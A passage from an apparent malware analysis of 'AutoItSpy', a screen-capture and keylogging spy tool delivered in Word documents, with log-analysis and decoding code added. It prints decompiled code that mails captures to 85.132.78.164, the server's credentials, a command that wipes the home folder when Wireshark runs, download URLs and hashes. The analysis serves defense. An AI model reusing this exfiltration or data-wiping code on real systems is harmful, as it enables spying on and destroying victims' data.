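    handoffs = []
    for p in pollers:
        expected = p["last"] + timedelta(seconds=p["period"])
        for e in entries:
            if (e["path"] == p["path"] and e["ip"] not in p["ips"]
                    and abs((e["time"] - expected).total_seconds()) <= tolerance):
                handoffs.append((p["ips"][-1], e["ip"], e["time"].isoformat()))
    return handoffs
```

Running the three functions over `parse_log(SAMPLE_LINES)` tags the five scanner and flood entries, reports the Firefox/8.0 poller from both 85.132.24.74 and 85.132.24.77, and links the last 85.132.24.77 poll to the 85.132.78.164 request that arrives one period later.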

Active domains in that network include:

vpn.az-ix.net 85.132.78.130
mail1.fincaazerbaijan.com 85.132.78.210
mail.safa.az 85.132.78.150

“AutoItSpy” – Targeted malware collects screen and keyboard captures from victims

Targeted malware in Word document

A few months ago, we were informed of a campaign of targeted malware sent as Word documents. For example, one of the mails included a document with information about a “List of Prisoners”. Several other samples of the same malware have been sent in the last months.

“Prisoners List” document containing malware

The malware collects screen captures of the victim and sends them via e-mail to IP address 85.132.78.164. The mail also includes details of the victim’s hardware and operating system.

Examples of such malware have been available on VirusTotal since as early as June 2016:

Virustotal: 4c03d77e0d006fbb1569376971f791df1bafe9448099b7aabd51b2359721447a

Virustotal: df6efa3cb44923487f14a81106e5060eb5b4a4a74d7658ae6214f60ad664c6e5

Other references to similar samples are here

According to VirusTotal, the malware has been available at the following locations:

http://www.qanun.az/wp-admin/flash_player.scr
http://qanun.az/wp-admin/flash_player.scr
http://qanun.az/wp-admin/user/flash_player_update.scr
http://tia.az/css/responsive/flash_player_update.scr
http://www.qanun.az/wp-admin/user/flash_player_update.scr

When we tried to disassemble the code we got some motivating messages from the attackers! Their encouragement was of great inspiration.

The AutoIt based code hides the IP address and credentials of the server that collects the screen captures in this part of the disassembled code.

The malware makes several connections to the website http://ietf.org/index.html to verify connectivity, using the following user agent:

HttpSetUserAgent("Mozilla/6.0 (Windows NT 23.6; WOWxWow; Trident/33.0;rv:16.0) like Internet Explorer 13 Gecko 13" & Random(1, 10000000, 1))

Our skills improved 🙂 Good kung fu… and… wow! That mail server again:

; $chrmail decodes to yoxlanis@local.remote, the mailbox used for exfiltration
$chrmail = Chr(121) & Chr(111) & Chr(120) & Chr(108) & Chr(97) & Chr(110) & Chr(105) & Chr(115) & Chr(64) & Chr(108) & Chr(111) & Chr(99) & Chr(97) & Chr(108) & Chr(46) & Chr(114) & Chr(101) & Chr(109) & Chr(111) & Chr(116) & Chr(101)
; $smtpserver decodes to 85.132.78.164
$smtpserver = Chr(56) & Chr(53) & Chr(46) & Chr(49) & Chr(51) & Chr(50) & Chr(46) & Chr(55) & Chr(56) & Chr(46) & Chr(49) & Chr(54) & Chr(52)
$fromname = "YTGH 2"
$fromaddress = $chrmail
$toaddress = $chrmail
$subject = Random(1, 100000) & " Eklenti  " & Random(1, 100000)
$username = $chrmail
; $password decodes to yoxlada
$password = Chr(121) & Chr(111) & Chr(120) & Chr(108) & Chr(97) & Chr(100) & Chr(97)
; Host fingerprint placed in the mail body. The Azerbaijani labels are: processor
; architecture, OS architecture, OS, operating system version, machine name,
; current user, IP addresses, desktop width; then the capture time and a unique ID.
$finallog = "Prosessor arx: " & @CPUArch & @CRLF & "OS arx: " & @OSArch & @CRLF & "OS: " & @OSType & @CRLF & "Emeliyyat Sistemi : " & @OSVersion & @CRLF & "Mashininadi: " & @ComputerName & @CRLF & "Cari istifadeci: " & @UserName & @CRLF & "IPadres: " & @IPAddress1 & @CRLF & "IPadres: " & @IPAddress2 & @CRLF & "IPadres: " & @IPAddress3 & @CRLF & "IPadres: " & @IPAddress4 & @CRLF & "Ischi masanin Width-i: " & @DesktopWidth & @CRLF & "Desktop Height: " & @DesktopHeight & @CRLF & $finalipadresses & @CRLF
$tarixisaatpc = "Vaxt: " & @HOUR & ":" & @MIN & " " & "[" & @MDAY & "/" & @MON & "/" & @YEAR & "]" & @CRLF & "Unik@l ID: " & $unikalid & @CRLF

Detecting the presence of Wireshark capturing network traffic. Wow! This is nasty: deleting the whole home folder. Why do you Sleep(800) after that?

If ProcessExists("wireshark.exe") OR ProcessExists("dumpcap.exe") OR ProcessExists("tshark.exe") OR ProcessExists("wireshark-gtk.exe") Then
		Run(@ComSpec & " /c rmdir /q /s %homedrive%", @ScriptDir, @SW_HIDE)
		Run(@ComSpec & " /c rmdir /q /s %homepath%", @ScriptDir, @SW_HIDE)
		Sleep(800)
	Next
	MsgBox(64, "Error", "Error", 2)
	Exit
EndIf

The process servicepool.exe contains a keylogger that stores keystrokes in files named Thumbs-*.txt. The screen captures (*.jpg) and keystrokes (Thumbs-*.txt) are sent as file attachments.

$tarixi = @HOUR & "_" & @MIN & "_" & @SEC & "_" & "-" & @MDAY & "_" & @MON & "_" & @YEAR
FileWrite($wheretostay & "\Thumbs-" & $tarixi & ".txt", $dataz & @CRLF)

The variable $smtpserver contains the IP address of the SMTP server, 85.132.78.164. A full copy of the AutoIt source code is here and here.

Using a mail server in the Government network to collect the screen captures

Screen captures are sent to a mail server at 85.132.78.164 using the account “yoxlanis@local.remote”, password “yoxlada” (yoxlanış, yoxlana).

220 WIN-RL76B2OKD4G ESMTP
EHLO lc9Y6kl23Y
250-WIN-RL76B2OKD4G
250-SIZE 20480000
250-AUTH LOGIN
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
eW94bGFuaXNAbG9jYWwucmVtb3Rl   <- yoxlanis@local.remote
334 UGFzc3dvcmQ6
eW94bGFkYQ== <- yoxlada
235 authenticated.
MAIL FROM: <yoxlanis@local.remote>
250 OK
RCPT TO: <yoxlanis@local.remote>
250 OK
DATA
354 OK, send.
thread-index: AdKBpWrF3z6LUmH6RrW3/vcKOLUm0Q==
Thread-Topic: 86107.421989471 Eklenti  12963.9537323045
From: "YTGH 2" <yoxlanis@local.remote>
To: <yoxlanis@local.remote>
Subject: 86107.421989471 Eklenti  12963.9537323045
Date: Tue, 7 Feb 2017 17:00:00 -0800
Message-ID: <7BF0921BF00E4A099B7AB48A87995B7E@PSPUBWSPC>
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_0001_01D28163.9E8AD610"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: Normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17514
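The Chr() chains in the decompiled AutoIt source above and the AUTH LOGIN exchange in this transcript encode the same account. The following Python is an example added to this report (not the authors' tooling and not the malware's code): it decodes both artifacts and cross-checks them. The Chr() evaluator assumes plain string assignments (Chr(n), quoted literals and references to earlier variables joined with &), which is all the quoted excerpts use; anything else is left undecoded.

```python
import base64
import re

# Excerpts of the decompiled AutoIt source quoted in the report.
AUTOIT_SOURCE = """
$chrmail = Chr(121) & Chr(111) & Chr(120) & Chr(108) & Chr(97) & Chr(110) & Chr(105) & Chr(115) & Chr(64) & Chr(108) & Chr(111) & Chr(99) & Chr(97) & Chr(108) & Chr(46) & Chr(114) & Chr(101) & Chr(109) & Chr(111) & Chr(116) & Chr(101)
$smtpserver = Chr(56) & Chr(53) & Chr(46) & Chr(49) & Chr(51) & Chr(50) & Chr(46) & Chr(55) & Chr(56) & Chr(46) & Chr(49) & Chr(54) & Chr(52)
$fromname = "YTGH 2"
$fromaddress = $chrmail
$subject = Random(1, 100000) & " Eklenti  " & Random(1, 100000)
$username = $chrmail
$password = Chr(121) & Chr(111) & Chr(120) & Chr(108) & Chr(97) & Chr(100) & Chr(97)
"""

# The AUTH LOGIN part of the SMTP session captured in the report.
SMTP_TRANSCRIPT = """
AUTH LOGIN
334 VXNlcm5hbWU6
eW94bGFuaXNAbG9jYWwucmVtb3Rl
334 UGFzc3dvcmQ6
eW94bGFkYQ==
235 authenticated.
"""

ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*(.+?)\s*$")
# One operand of an AutoIt string concatenation: Chr(n), "literal" or $variable
TOKEN_RE = re.compile(r'Chr\((\d+)\)|"([^"]*)"|\$(\w+)')


def decode_autoit_strings(source):
    """Evaluate AutoIt string assignments built from Chr(n) concatenations,
    quoted literals and references to earlier variables, in source order.
    Assignments containing anything else (function calls, macros) are skipped."""
    values = {}
    for line in source.splitlines():
        m = ASSIGN_RE.match(line.strip())
        if not m:
            continue
        name, rhs = m.groups()
        parts = []
        for piece in rhs.split("&"):
            t = TOKEN_RE.fullmatch(piece.strip())
            if t is None:
                break  # not a pure string expression: leave it undecoded
            code, literal, ref = t.groups()
            if code is not None:
                parts.append(chr(int(code)))
            elif literal is not None:
                parts.append(literal)
            elif ref in values:
                parts.append(values[ref])
            else:
                break  # reference to a variable we have not decoded
        else:
            values[name] = "".join(parts)
    return values


def decode_auth_login(transcript):
    """Recover the credentials from an SMTP AUTH LOGIN exchange: each
    '334 <base64 prompt>' line is followed by the client's base64 answer."""
    lines = [l.strip() for l in transcript.splitlines() if l.strip()]
    creds = {}
    for prompt, answer in zip(lines, lines[1:]):
        if prompt.startswith("334 "):
            key = base64.b64decode(prompt[4:]).decode().rstrip(":").lower()
            creds[key] = base64.b64decode(answer).decode()
    return creds


def credentials_match(source, transcript):
    """True when the decompiled source and the captured session agree on the
    account and password, tying the sample to the server it reports to."""
    v = decode_autoit_strings(source)
    c = decode_auth_login(transcript)
    return (v.get("username"), v.get("password")) == (c.get("username"), c.get("password"))
```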